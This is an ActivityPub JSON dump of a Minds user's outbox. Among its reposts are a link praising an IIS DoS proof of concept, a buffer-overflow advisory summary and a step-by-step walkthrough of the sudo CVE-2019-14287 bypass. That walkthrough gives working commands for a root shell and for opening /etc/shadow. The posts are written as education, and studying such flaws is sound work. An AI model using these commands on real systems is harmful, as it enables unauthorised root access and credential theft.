ActivityPub Viewer

A small tool to view real-world ActivityPub objects as JSON! Enter a URL or username from Mastodon or a similar service below, and we'll send a request with the right Accept header to the server to view the underlying object.

Open in browser →
{ "@context": "https://www.w3.org/ns/activitystreams", "type": "OrderedCollectionPage", "orderedItems": [ { "type": "Announce", "actor": "https://www.minds.com/api/activitypub/users/1228105417054232589", "object": { "type": "Note", "id": "https://www.minds.com/api/activitypub/users/859089867332657169/entities/urn:activity:859861097089994752", "attributedTo": "https://www.minds.com/api/activitypub/users/859089867332657169", "content": "Good script for DoS. <br /><a href=\"https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC\" target=\"_blank\">https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC</a>", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/859089867332657169/followers" ], "tag": [], "url": "https://www.minds.com/newsfeed/859861097089994752", "published": "2018-06-30T18:21:00+00:00", "source": { "content": "Good script for DoS. \nhttps://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC", "mediaType": "text/plain" } }, "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228112975869296640/activity", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/859089867332657169", "https://www.minds.com/api/activitypub/users/1228105417054232589/followers" ] }, { "type": "Announce", "actor": "https://www.minds.com/api/activitypub/users/1228105417054232589", "object": { "type": "Note", "id": "https://www.minds.com/api/activitypub/users/1033018353637138451/entities/urn:activity:1038223184929099776", "attributedTo": "https://www.minds.com/api/activitypub/users/1033018353637138451", "content": "NEW SUDO EXPLOIT FOR LINUX HAS BEEN FOUND!!!!<br /><br />Vulnerability Details:<br /><br />Release date: 3rd November 2019<br /><br />CVE ID: CVE-2019-14287<br /><br />Affected Versions: Versions prior to &lt;= 1.8.28<br /><br />Released On: <a href=\"https://www.sudo.ws/\" target=\"_blank\">https://www.sudo.ws/</a><br /><br />Brief description of vulnerability<br /><br />The security policy bypass vulnerability that allows users on a Linux system to execute commands as root, while the user permissions in the sudoers file explicitly prevents these commands from being run as root.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />It can be executed by a user that has ALL permissions in the Runas specification. Which means they can execute commands as any or all users on the system.<br /><br />This consequently allows users to run commands and tools as root by specifying the user id (UID) as -1 or the unsigned equivalent of -1: 4294967295<br /><br />sudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id<br /><br />Explanation of exploit<br />What is sudo?<br />sudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for super user do.<br /><br />You can also use the su (switch user) command to switch the superuser.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />How to check sudo version installed?<br /><br />sudo –version or sudo –version | grep version<br /><br />How user information is stored in Linux<br /><br />Each user account has a username, unique identifier (UID), group(GID), home directory, and the default shell to be used when the user logs in to the system.<br /><br />All user account related information is stored in the passwd file, located in /etc/passwd<br /><br />Passwords in the passwd file are encrypted and are therefore represented by an x.<br /><br />The encrypted passwords for accounts are stored in the shadow file, located in /etc/shadow. The shadow file can only be accessed by the root user.<br /><br />Structure of user account<br /><br />username:password:UID:GID:comments:home_directory:shell<br /><br />The first user in the passwd file is the root account<br /><br />The root account always has a UID of 0<br /><br />System accounts have a UID of less than 1000 while user accounts have UID &gt;= 1000<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />The sudoers file<br /><br />The sudoers file contains all the permissions for users and groups on a Linux system. it is found in /etc/sudoers<br /><br />The sudoers file can be accessed and modified securely by using visudo.<br /><br />visudo is a tool that allows you to access and make changes to the sudoers file securely, it does this by ensuring that only one user is editing the sudoers file and by checking for logical errors.<br /><br />We will use visudo to demonstrate the exploit.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />POC<br />This will depend on user permissions in regards to commands specified within the sudoers file.<br /><br />Requirements:<br />The user requires sudo privileges that allow running of commands with user ID’s – We will be setting this up in the sudoers file<br />sudo version &lt;= 1.8.28<br /><br />1) Create user on system.<br /><br />2) Modify the sudoers file with visudo.<br /><br />3) Provide the user with sudo privileges and specify the commands that can be run.<br /><br />alexis ALL=(ALL, !root) /usr/bin/vi<br /><br />4) You can also specify a command alias.<br /><br />Cmnd_Alias VIM = /usr/bin/vi<br /><br />5) After setting up permissions, log in as user alexis and run command:<br /><br />sudo -u#-1 vi /etc/shadow<br /><br />6) To confirm this try running it without specifying the UID.<br /><br />sudo vi /etc/shadow<br /><br />This confirms that the UID -1 bypasses the permissions and allows for command execution.<br /><br />You can also confirm this by using the id command.<br /><br />7) If a user can run any command then we can get a bash shell as root user<br /><br />alexis ALL=(ALL, !root) ALL<br /><br />sudo -u#-1 bash<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Stay Safe Out There Everyone!!!<br /><br />New Exploits Are Found Everyday!!!!<br /><br /><a href=\"https://www.minds.com/search?f=top&amp;t=all&amp;q=linux\" title=\"#linux\" class=\"u-url hashtag\" target=\"_blank\">#linux</a> <a href=\"https://www.minds.com/search?f=top&amp;t=all&amp;q=hacking\" title=\"#hacking\" class=\"u-url hashtag\" target=\"_blank\">#hacking</a> <a href=\"https://www.minds.com/search?f=top&amp;t=all&amp;q=programming\" title=\"#programming\" class=\"u-url hashtag\" target=\"_blank\">#programming</a> <a href=\"https://www.minds.com/search?f=top&amp;t=all&amp;q=education\" title=\"#education\" class=\"u-url hashtag\" target=\"_blank\">#education</a> <a href=\"https://www.minds.com/search?f=top&amp;t=all&amp;q=technology\" title=\"#technology\" class=\"u-url hashtag\" target=\"_blank\">#technology</a>", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/1033018353637138451/followers" ], "tag": [], "url": "https://www.minds.com/newsfeed/1038223184929099776", "published": "2019-11-05T20:00:00+00:00", "source": { "content": "NEW SUDO EXPLOIT FOR LINUX HAS BEEN FOUND!!!!\n\nVulnerability Details:\n\nRelease date: 3rd November 2019\n\nCVE ID: CVE-2019-14287\n\nAffected Versions: Versions prior to &lt;= 1.8.28\n\nReleased On: https://www.sudo.ws/\n\nBrief description of vulnerability\n\nThe security policy bypass vulnerability that allows users on a Linux system to execute commands as root, while the user permissions in the sudoers file explicitly prevents these commands from being run as root.\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nIt can be executed by a user that has ALL permissions in the Runas specification. Which means they can execute commands as any or all users on the system.\n\nThis consequently allows users to run commands and tools as root by specifying the user id (UID) as -1 or the unsigned equivalent of -1: 4294967295\n\nsudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id\n\nExplanation of exploit\nWhat is sudo?\nsudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for super user do.\n\nYou can also use the su (switch user) command to switch the superuser.\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nHow to check sudo version installed?\n\nsudo –version or sudo –version | grep version\n\nHow user information is stored in Linux\n\nEach user account has a username, unique identifier (UID), group(GID), home directory, and the default shell to be used when the user logs in to the system.\n\nAll user account related information is stored in the passwd file, located in /etc/passwd\n\nPasswords in the passwd file are encrypted and are therefore represented by an x.\n\nThe encrypted passwords for accounts are stored in the shadow file, located in /etc/shadow. The shadow file can only be accessed by the root user.\n\nStructure of user account\n\nusername:password:UID:GID:comments:home_directory:shell\n\nThe first user in the passwd file is the root account\n\nThe root account always has a UID of 0\n\nSystem accounts have a UID of less than 1000 while user accounts have UID &gt;= 1000\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe sudoers file\n\nThe sudoers file contains all the permissions for users and groups on a Linux system. it is found in /etc/sudoers\n\nThe sudoers file can be accessed and modified securely by using visudo.\n\nvisudo is a tool that allows you to access and make changes to the sudoers file securely, it does this by ensuring that only one user is editing the sudoers file and by checking for logical errors.\n\nWe will use visudo to demonstrate the exploit.\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nPOC\nThis will depend on user permissions in regards to commands specified within the sudoers file.\n\nRequirements:\nThe user requires sudo privileges that allow running of commands with user ID’s – We will be setting this up in the sudoers file\nsudo version &lt;= 1.8.28\n\n1) Create user on system.\n\n2) Modify the sudoers file with visudo.\n\n3) Provide the user with sudo privileges and specify the commands that can be run.\n\nalexis ALL=(ALL, !root) /usr/bin/vi\n\n4) You can also specify a command alias.\n\nCmnd_Alias VIM = /usr/bin/vi\n\n5) After setting up permissions, log in as user alexis and run command:\n\nsudo -u#-1 vi /etc/shadow\n\n6) To confirm this try running it without specifying the UID.\n\nsudo vi /etc/shadow\n\nThis confirms that the UID -1 bypasses the permissions and allows for command execution.\n\nYou can also confirm this by using the id command.\n\n7) If a user can run any command then we can get a bash shell as root user\n\nalexis ALL=(ALL, !root) ALL\n\nsudo -u#-1 bash\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nStay Safe Out There Everyone!!!\n\nNew Exploits Are Found Everyday!!!!\n\n#linux #hacking #programming #education #technology", "mediaType": "text/plain" } }, "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228112943656087552/activity", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/1033018353637138451", "https://www.minds.com/api/activitypub/users/1228105417054232589/followers" ] }, { "type": "Announce", "actor": "https://www.minds.com/api/activitypub/users/1228105417054232589", "object": { "type": "Note", "id": "https://www.minds.com/api/activitypub/users/630362587996893189/entities/urn:activity:1199199461550739456", "attributedTo": "https://www.minds.com/api/activitypub/users/630362587996893189", "content": "Vulnerability: Remote Stack Buffer Overflow - (UDP Datagram)<br />Description: Creates a service \"Microsoft ASPI Manager\" and listens on<br />TCP ports 80, 81 and UDP 53. The service process is a dropped<br />executable named aspimgr.exe that runs with SYSTEM integrity. Third<br />party attackers can send 332 bytes to UDP port 53 to overwrite the<br />instruction pointer (EIP) and possibly gain SYSTEM privileges.<br />The Exploit PoC uses the typical 41414141 pattern and 52525252 \"R\"<br />character for EIP overwrite.<br /><a href=\"https://seclists.org/fulldisclosure/2021/Jan/56\" target=\"_blank\">https://seclists.org/fulldisclosure/2021/Jan/56</a>", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/630362587996893189/followers" ], "tag": [], "url": "https://www.minds.com/newsfeed/1199199461550739456", "published": "2021-01-22T03:50:31+00:00", "source": { "content": "Vulnerability: Remote Stack Buffer Overflow - (UDP Datagram)\nDescription: Creates a service \"Microsoft ASPI Manager\" and listens on\nTCP ports 80, 81 and UDP 53. The service process is a dropped\nexecutable named aspimgr.exe that runs with SYSTEM integrity. Third\nparty attackers can send 332 bytes to UDP port 53 to overwrite the\ninstruction pointer (EIP) and possibly gain SYSTEM privileges.\nThe Exploit PoC uses the typical 41414141 pattern and 52525252 \"R\"\ncharacter for EIP overwrite.\nhttps://seclists.org/fulldisclosure/2021/Jan/56", "mediaType": "text/plain" } }, "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228112925792546816/activity", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/630362587996893189", "https://www.minds.com/api/activitypub/users/1228105417054232589/followers" ] }, { "type": "Create", "actor": "https://www.minds.com/api/activitypub/users/1228105417054232589", "object": { "type": "Note", "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228112339563192320", "attributedTo": "https://www.minds.com/api/activitypub/users/1228105417054232589", "content": "<a class=\"u-url mention\" href=\"https://www.minds.com/christiaanbroeders\" target=\"_blank\">@christiaanbroeders</a> looks good so far! Lets see how this goes.. ;)", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/1228105417054232589/followers" ], "tag": [ { "type": "Mention", "href": "https://www.minds.com/api/activitypub/users/941388105292718089", "name": "@christiaanbroeders" } ], "url": "https://www.minds.com/newsfeed/1228112339563192320", "published": "2021-04-11T22:39:58+00:00", "source": { "content": "@christiaanbroeders looks good so far! Lets see how this goes.. ;)", "mediaType": "text/plain" } }, "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228112339563192320/activity" }, { "type": "Create", "actor": "https://www.minds.com/api/activitypub/users/1228105417054232589", "object": { "type": "Note", "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228111789589147648", "attributedTo": "https://www.minds.com/api/activitypub/users/1228105417054232589", "content": "Well. Here's another place I am. Let's see if this one is a little less fucked than the previous social media outlets like Twitter, Facebook, etc. ", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://www.minds.com/api/activitypub/users/1228105417054232589/followers" ], "tag": [], "url": "https://www.minds.com/newsfeed/1228111789589147648", "published": "2021-04-11T22:37:47+00:00", "source": { "content": "Well. Here's another place I am. Let's see if this one is a little less fucked than the previous social media outlets like Twitter, Facebook, etc. ", "mediaType": "text/plain" } }, "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/entities/urn:activity:1228111789589147648/activity" } ], "id": "https://www.minds.com/api/activitypub/users/1228105417054232589/outbox", "partOf": "https://www.minds.com/api/activitypub/users/1228105417054232589/outboxoutbox" }